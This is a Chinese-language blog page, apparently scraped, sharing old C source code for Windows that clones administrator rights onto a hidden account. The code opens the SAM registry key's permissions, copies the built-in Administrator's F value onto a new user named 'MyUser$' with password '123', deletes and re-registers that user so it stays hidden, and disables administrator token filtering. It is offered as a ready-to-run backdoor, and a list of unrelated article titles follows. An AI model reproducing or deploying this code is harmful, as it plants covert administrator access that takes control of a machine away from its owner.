克隆管理员代码
来源:互联网 发布:windows共享文件夹密码 编辑:程序博客网 时间:2024/05/25 21:32
翻看了N年前的代码,看到了这个。
#include <stdio.h>#include <aclapi.h>#include <windows.h> #include <lm.h>#pragma comment(lib, "netapi32.lib")typedef struct _KeyValue{PBYTE value;DWORD KeyLen;}KeyValue, *PKeyValue;typedef struct _UserRegVal{DWORD UserNum; // User IDKeyValue F; // 0x100KeyValue V; // 0x400}UserRegVal, *PUserRegVal;BOOL AddUser(PWCHAR UserName, PWCHAR Passwd){USER_INFO_1 ui;DWORD dwLevel = 1;DWORD dwError = 0;NET_API_STATUS nStatus;ui.usri1_name = UserName;ui.usri1_password = Passwd;ui.usri1_priv = USER_PRIV_USER;ui.usri1_home_dir = NULL;ui.usri1_comment = NULL;ui.usri1_flags = UF_SCRIPT;ui.usri1_script_path = NULL;// add the usernStatus = NetUserAdd(NULL,dwLevel,(LPBYTE)&ui,&dwError);// successif (nStatus == NERR_Success){return TRUE;}return FALSE;}DWORD WriteObjectSecurity(int a1, LPWSTR pObjectName, int a3, PSECURITY_DESCRIPTOR bOwnerDefaulted){return 0;}VOID SetEveryOne(PWCHAR key){SetNamedSecurityInfoW( key, SE_REGISTRY_KEY, 0xB0000004, NULL, NULL, NULL, NULL);}DWORD SetAttribute(){DWORD result;PSECURITY_DESCRIPTOR pSecDesc;PACL pOldDACL, pNewDACL;EXPLICIT_ACCESS ea;GetNamedSecurityInfo(TEXT("MACHINE\\SAM\\SAM\\"), SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION,NULL,NULL,&pOldDACL,NULL,&pSecDesc);BuildExplicitAccessWithName(&ea, TEXT("administrators"),READ_CONTROL|WRITE_DAC|GENERIC_ALL|SUB_CONTAINERS_AND_OBJECTS_INHERIT, // FILE_READ_DATA|FILE_LIST_DIRECTORY|FILE_READ_ATTRIBUTES|FILE_READ_EA,SET_ACCESS, CONTAINER_INHERIT_ACE|OBJECT_INHERIT_ACE);result = SetEntriesInAcl(1, &ea, pOldDACL, &pNewDACL);if (result == ERROR_SUCCESS){result = SetNamedSecurityInfo(TEXT("MACHINE\\SAM\\SAM\\"),SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDACL, NULL);}return 0;}BOOL ReadUserReg(PWCHAR UserName, PUserRegVal UserReg){HKEY hKey;BOOL ntStatus = TRUE;DWORD KeyValue = 0;DWORD Type;PWCHAR buf = new WCHAR[MAX_PATH];wsprintfW(buf, L"SAM\\SAM\\Domains\\Account\\Users\\Names\\%s", UserName);// read admin F keylong lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, TEXT("SAM\\SAM\\Domains\\Account\\Users\\000001F4"), 0, KEY_READ, &hKey);if (lRet == ERROR_SUCCESS){Type = REG_BINARY;if (RegQueryValueEx(hKey, TEXT("F"), 0,&Type,UserReg->F.value, &UserReg->F.KeyLen) != ERROR_SUCCESS ){ntStatus = FALSE;}RegCloseKey(hKey);}else{ntStatus = FALSE;}// read user V keylRet = RegOpenKeyExW(HKEY_LOCAL_MACHINE, buf, 0, KEY_READ, &hKey);if (lRet == ERROR_SUCCESS){Type = REG_BINARY;PTCHAR lpName = new TCHAR[0x16];DWORD lpcbName = 0x16;PBYTE lpData = new BYTE[0x8];DWORD lpcbClass = 0x8;if ( RegEnumValue(hKey, 0, lpName,&lpcbName,NULL,&Type,lpData,&lpcbClass) == ERROR_SUCCESS ){UserReg->UserNum = Type;wsprintfW(buf, L"SAM\\SAM\\Domains\\Account\\Users\\%08X", Type);RegCloseKey(hKey);// reg read user V keylRet = RegOpenKeyExW(HKEY_LOCAL_MACHINE, buf, 0, KEY_READ, &hKey);if (lRet == ERROR_SUCCESS){Type = REG_BINARY;if (RegQueryValueEx(hKey, TEXT("V"), 0,&Type,UserReg->V.value, &UserReg->V.KeyLen) != ERROR_SUCCESS ){ntStatus = FALSE;}RegCloseKey(hKey);}else{ntStatus = FALSE;}}else{ntStatus = FALSE;}delete []lpData;delete []lpName;}else{ntStatus = FALSE;}delete []buf;return ntStatus;}// add the user into regeditBOOL SetUserReg(PWCHAR UserName, PUserRegVal UserReg){PWCHAR buf = new WCHAR[MAX_PATH];HKEY hKey;BOOL ntStatus = TRUE; wsprintfW(buf, L"SAM\\SAM\\Domains\\Account\\Users\\%08X", UserReg->UserNum);if( ERROR_SUCCESS == RegCreateKeyExW( HKEY_LOCAL_MACHINE,buf,0,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&hKey,0)){RegSetValueEx(hKey, TEXT("V"), 0, REG_BINARY, UserReg->V.value, UserReg->V.KeyLen);RegSetValueEx(hKey, TEXT("F"), 0, REG_BINARY, UserReg->F.value, UserReg->F.KeyLen);RegCloseKey(hKey);}else{ntStatus = FALSE;}wsprintfW(buf, L"SAM\\SAM\\Domains\\Account\\Users\\Names\\%s", UserName);if( ERROR_SUCCESS == RegCreateKeyExW( HKEY_LOCAL_MACHINE,buf,0,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&hKey,0)){RegSetValueEx(hKey, NULL, 0, UserReg->UserNum, NULL, NULL);RegCloseKey(hKey);}else{ntStatus = FALSE;}return ntStatus;}BOOL DelUser(PWCHAR UserName){NET_API_STATUS nStatus;// delete the usernStatus = NetUserDel(NULL, UserName);if (NERR_Success == nStatus){return TRUE;}return FALSE;}// clone the administrator setBOOL CloneAdmin(PWCHAR UserName, PWCHAR Passwd){// add userif (!AddUser(UserName, Passwd)){return FALSE;}// set Reg attribif (!SetAttribute()){return FALSE;}// copy the admin permissionUserRegVal value;value.V.value = new BYTE[0x400];if ( value.V.value != NULL ){value.V.KeyLen = 0x400;}value.F.value = new BYTE[0x100];if ( value.F.value != NULL ){value.F.KeyLen = 0x100;}ReadUserReg( UserName, &value);// delete userif (!DelUser(UserName)){return FALSE;}// set the Regedit permissionSetUserReg(UserName, &value);return TRUE;}// In Vista set the administrator not filter TokenBOOL SetFilterFalse(){HKEY hKey;BOOL ntStatus = TRUE;DWORD KeyValue = 0;long lRet = RegCreateKeyEx(HKEY_LOCAL_MACHINE,TEXT("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\system"),0,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&hKey,NULL);if (lRet != ERROR_SUCCESS){return FALSE;}if (ERROR_SUCCESS != RegSetValueEx(hKey, TEXT("FilterAdministratorToken"), 0, REG_DWORD, (const unsigned char *) &KeyValue, 4) ){ntStatus = FALSE;}RegCloseKey(hKey);return ntStatus;}int main(int argc, char* argv[]){if ( SetFilterFalse() ){if ( CloneAdmin(L"MyUser$", L"123") ){MessageBox(NULL, TEXT("设置隐藏用户成功"), NULL, NULL);}}return 0;}
0 0
- 克隆管理员代码
- 克隆代码
- 批处理学习之四 克隆管理员账户
- windows server 2008R2管理员帐户克隆
- 深克隆C#代码
- 1. Git 克隆代码
- 关于win03利用SID原理--克隆管理员账号
- 对象克隆之DeepClone代码
- git克隆代码到本地
- 代码克隆的类别总结
- JS深度克隆代码实现
- git 命令行提交代码和克隆代码
- 【怎样写代码】对象克隆 -- 原型模式(四):浅克隆与深克隆
- 管理员
- 管理员克隆gitolite-admin时提示“ERROR:gitosis.app:Configuration does not exist”错误
- 直接以管理员身份运行bat代码
- 以管理员身份运行bat代码
- 克隆
- SVN操作
- android闪屏效果实现
- 【学习记录】面向对象的基本概念5
- CentOS6.4下Mysql数据库的安装与配置
- 便不由自主的朝她所在的方向走去,
- 克隆管理员代码
- Myeclipse项目名为什么会带'>'和IP
- 常用的可变字符串处理实例方法 API文档 NSMutableString
- poj 2392 Space Elevator
- linux 6.5 安装oracle 11g 系统缺包的检查
- php curl判断一个远程文件在不在
- 杭电1878————欧拉回路基础题目
- 一个测试脚本,测试lvm
- Core Location和MapKit的一些简单使用